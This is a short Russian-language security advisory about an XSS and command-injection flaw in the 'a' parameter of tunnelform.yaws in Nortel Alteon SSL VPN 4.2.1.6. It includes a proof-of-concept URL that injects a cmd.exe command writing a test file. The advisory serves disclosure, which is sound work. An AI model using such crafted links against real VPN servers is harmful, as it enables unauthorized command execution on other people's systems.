Программа: Nortel Alteon SSL VPN 4.2.1.6
Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует при обработке входных данных в параметре "a" сценария "tunnelform.yaws".
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольный HTML код в браузере жертвы в контексте безопасности
уязвимого сайта. Уязвимость позволяет выполнить произвольные команды на системе
с помощью специально сформированной ссылки.
Пример:
https://SSL_VPN_SERVER/tunnelform.yaws?a= +cmd.exe+/c+echo+test+%3E+
c:\\test.txt+&type=Custom&sp=443&n=1&ph= &pp=&0tm=tcp&0lh=127.0.0.1&
0lp=8080&0hm=&0rh=10.10.10.10&0rp= 80&sslEnabled=on&start=Start...